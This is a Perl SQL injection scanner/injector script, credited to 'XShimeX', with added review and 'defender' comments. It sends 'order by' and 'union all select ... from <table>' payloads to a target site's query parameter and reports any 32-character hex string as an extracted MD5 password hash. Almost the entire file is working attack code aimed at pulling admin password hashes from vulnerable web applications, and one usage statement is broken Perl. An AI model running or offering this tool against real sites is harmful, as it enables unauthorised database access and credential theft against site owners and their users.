#SQL Injection Scanner/Injector By XShimeX
#Contact: slientro[AT]yahoo.com.my
use strict;
use warnings;
use LWP::UserAgent;
use IO::Socket::INET;
use HTTP::Request::Common;
use Getopt::Long qw(:config no_ignore_case);
# Banner printed on every run, before any option parsing.
print "
[*]SQL Injection Scanner/Injector By XShimeX\n";
print "
[*]Script only Support MD5 Password\n";
# One shared HTTP client with an in-memory cookie jar. The User-Agent is the
# fixed literal "Mozilla FireFox", which does not match the User-Agent format
# real Firefox builds send, so requests from this script are easy to pick out
# in web-server access logs.
my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla FireFox" );
# Option defaults: every switch starts out as an empty string.
my %parms = (
s => "",
f => "",
d => "",
o => "",
u => "",
i => "",
e => "",
c => "",
eu => "",
sv => "",
t => "" );
# Parse the command line into %parms.
# NOTE(review): "u=s" is listed twice, and "p=s" has no default in %parms and
# is not read anywhere in the code shown here.
GetOptions \%parms, "s=s", "u=s", "f=s", "o=s", "u=s", "i=s","p=s","e=s", "d=s", "t=s", "c=s", "eu=s", "sv";
# Without -s the script is meant to print the usage text and stop.
# NOTE(review): the text between `die` and `HELP` looks like a heredoc whose
# opening marker was lost when the page was extracted; as printed here the
# `die` statement is not valid Perl.
if( !$parms{s} ) {
die [*]Usage: $0
[-s] Site -> http://url.com
[-f] Path/Files -> pages/news.php
[-d] Do -> 0 : Order 1 : Union
[-i] GET -> news_id=-2
[-o] Order -> 2
[-u] Union Select -> 1,2,3
[-c] Column -> password
[-eu] End union -> 4,5,6
[-e] End of syntax -> /* or --
[-t] Table -> Admin
[-sv] Save the HTML Source to file (use to view error or info) -> -sv
HELP
}
# Mode dispatch on -d. `!` binds tighter than `==`, so this compares the
# negation of -d with 1: an empty or "0" value runs scan() (the "order by"
# request) and any other true value runs scan2() (the "union all select"
# request).
if (!$parms{d} == 1){
scan();
}else {
scan2();
}
# scan: "order by" mode.
#
# Builds one GET URL from the file-scope %parms (-s site, -f path, -i query
# parameter, -o column index, -e trailing comment marker), sends it through
# the shared $ua, and looks for MySQL error text in the response body.
# Takes no arguments and returns nothing useful; all output goes to STDOUT
# and, with -sv, to log.html.
#
# Defender notes: the request carries the literal text "order by" in the query
# string together with the fixed "Mozilla FireFox" User-Agent, both of which
# are visible in access logs. The checks below only produce a signal when the
# application returns raw database error messages in the page.
sub scan{
# The message says "Die" but this branch only prints; execution continues.
if (!$parms{s}){
print "
[*]Die ! Can't Use if you not enter URL ;(\n";
}
# Without -f nothing is requested; the whole request path is in the else arm.
if (!$parms{f}){
print "
[*]Die ! Can't Use if you not enter File path ;(\n";
}else{
print "
[*]Website -> ".$parms{s}."\n";
print "
[*]File -> ".$parms{f}."\n";
# URL pieces are joined by plain string concatenation; nothing here encodes
# or validates the option values.
my $file = "/".$parms{f}."?";
my $order = "order by ".$parms{o}."";
my $ordernew = $parms{o};
my $item = $parms{i};
my $end = $parms{e};
my $target = $parms{s}."$file"."$item "."$order"." $end";
my $request = $ua->request(HTTP::Request->new(GET=>$target));
# $request actually holds the response object; content() is the raw body.
my $answer = $request->content;
# -sv appends the response body verbatim to log.html in the current
# directory. The return value of open() is not checked, and the saved file
# contains whatever HTML/script the remote server sent, so it is safer to
# read it in a text editor than to open it in a browser.
if ($parms{sv}){
open (LOG, '>>log.html');
print LOG "$answer\r\n";
print "
[*]File save ;).";
close(LOG);
}
# Echo the exact URL that was requested.
print "\n";
print $target;
print "\n";
# MySQL syntax-error text in the body is reported as a malformed payload.
if ($answer =~/(You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near)/){
print "
[*]Got This error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near\n";
print "
[*]Maybe you forgot to enter -e -- or -e /*\n";
}
# $ordernew is interpolated into the pattern unquoted, so any regex
# metacharacters in -o are treated as pattern syntax. The else arm belongs to
# this check only, so the "no error" message is also printed when the
# syntax-error branch above matched.
if ($answer =~/(Unknown column '$ordernew')/){
print "
[*]Order ID Was Wrong, Try other one ;)\n";
}else{
print "
[*]I think no error out or you can use '-sv' to read the error\n";
}
}
};
# scan2: "union" mode.
#
# Builds one GET URL from the file-scope %parms (-s site, -f path, -i query
# parameter, -u / -c / -eu select list, -t table, -e trailing comment marker),
# sends it through the shared $ua, and inspects the response body for MySQL
# error text or a 32-character hex string.
# Takes no arguments and returns nothing useful; all output goes to STDOUT
# and, with -sv, to log.html.
#
# Defender notes: the request carries the literal text "union all select" and
# "from <table>" in the query string together with the fixed "Mozilla FireFox"
# User-Agent, all of which are visible in access logs. The error-text checks
# only produce a signal when the application returns raw database error
# messages in the page.
sub scan2{
# The message says "Die" but this branch only prints; execution continues.
if (!$parms{s}){
print "
[*]Die ! Can't Use if you not enter URL ;(\n";
}
# Without -f nothing is requested; the whole request path is in the else arm.
if (!$parms{f}){
print "
[*]Die ! Can't Use if you not enter File path ;(\n";
}else{
print "
[*]Website -> ".$parms{s}."\n";
print "
[*]File -> ".$parms{f}."\n";
# URL pieces are joined by plain string concatenation; nothing here encodes
# or validates the option values.
my $file = "/".$parms{f}."?";
my $item = $parms{i};
my $table = "from ".$parms{t}." ";
my $end = $parms{e};
my $column = $parms{c};
my $endunion = $parms{eu};
my $union = "union all select ".$parms{u}.",".$column.",".$endunion." ";
my $target = $parms{s}."$file"."$item "."$union"."$table"." $end";
my $request = $ua->request(HTTP::Request->new(GET=>$target));
# $request actually holds the response object; content() is the raw body.
my $answer = $request->content;
# -sv appends the response body verbatim to log.html in the current
# directory. The return value of open() is not checked, and the saved file
# contains whatever HTML/script the remote server sent, so it is safer to
# read it in a text editor than to open it in a browser.
if ($parms{sv}){
open (LOG, '>>log.html');
print LOG "$answer";
print "
[*]File save ;).";
close(LOG);
}
# Echo the exact URL that was requested.
print "\n";
print $target;
print "\n";
# $column is interpolated into the pattern unquoted, so any regex
# metacharacters in -c are treated as pattern syntax.
if ($answer =~/(Unknown column '$column')/){
print "
[*]Unknown Column Name '".$column."'";
}
# MySQL's column-count mismatch message is reported as-is.
if ($answer =~/(The used SELECT statements have a different number of columns)/){
print "
[*]You got this error : The used SELECT statements have a different number of columns '".$column."'";
}
# The first run of 32 hex characters anywhere in the body is reported as an
# MD5 password hash. The pattern is unanchored, so unrelated values of that
# shape (or the first 32 characters of a longer hex string) also match; the
# result is not proof that a hash was returned. The else arm belongs to this
# check only.
if ($answer =~/([0-9a-fA-F]{32})/){
print "
[*]Password MD5: $1";
}else{
print "\n";
print "
[*]Attack Failed or you can use '-sv' to read the error \n";
}
}
};